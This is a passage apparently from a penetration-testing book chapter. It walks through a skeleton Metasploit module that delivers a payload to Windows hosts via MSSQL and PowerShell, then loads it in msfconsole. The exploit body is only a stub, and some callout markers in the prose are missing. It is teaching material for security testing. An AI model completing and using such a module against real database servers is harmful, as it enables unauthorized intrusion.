190
Chapter 13
def initialize(info = {}) # initialize the basic template
super(update_info(info,
'Name' => 'Microsoft SQL Server PowerShell Payload',
'Description' => %q{
This module will deliver our payload through Microsoft PowerShell
using MSSQL based attack vectors.
},
'Author' => [ 'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>'],
'License' => MSF_LICENSE,
'Version' => '$Revision: 8771 $',
'References' =>
[
[ 'URL', 'http://www.secmaniac.com' ]
],
'Platform' => 'win', # target only windows
'Targets' =>
[
[ 'Automatic', { } ], # automatic targeting
],
'DefaultTarget' => 0
))
register_options( # register options for the user to pick from
[
OptBool.new('UsePowerShell',[ false, "Use PowerShell as payload delivery
method instead", true]), # default to PowerShell
])
end
def exploit # define our exploit here; it does nothing at this point
handler # call the Metasploit handler
disconnect # after handler disconnect
end
end
Before this exploit will work properly, you’ll need to define some basic
settings. Notice that the name, description, licensing, and references are
defined at . We also define a platform at (Windows) and a target at
(all operating systems). We also define a new parameter called
UsePowerShell
at for use in the body of the exploit. Lastly, a handler is specified at to
handle the connections between the attacker and the exploited target.
Running the Shell Exploit
With the skeleton of the exploit built, we run it through
msfconsole
to see what
options are available:
msf >
use windows/mssql/mssql_powershell
msf exploit(mssql_powershell) >
show options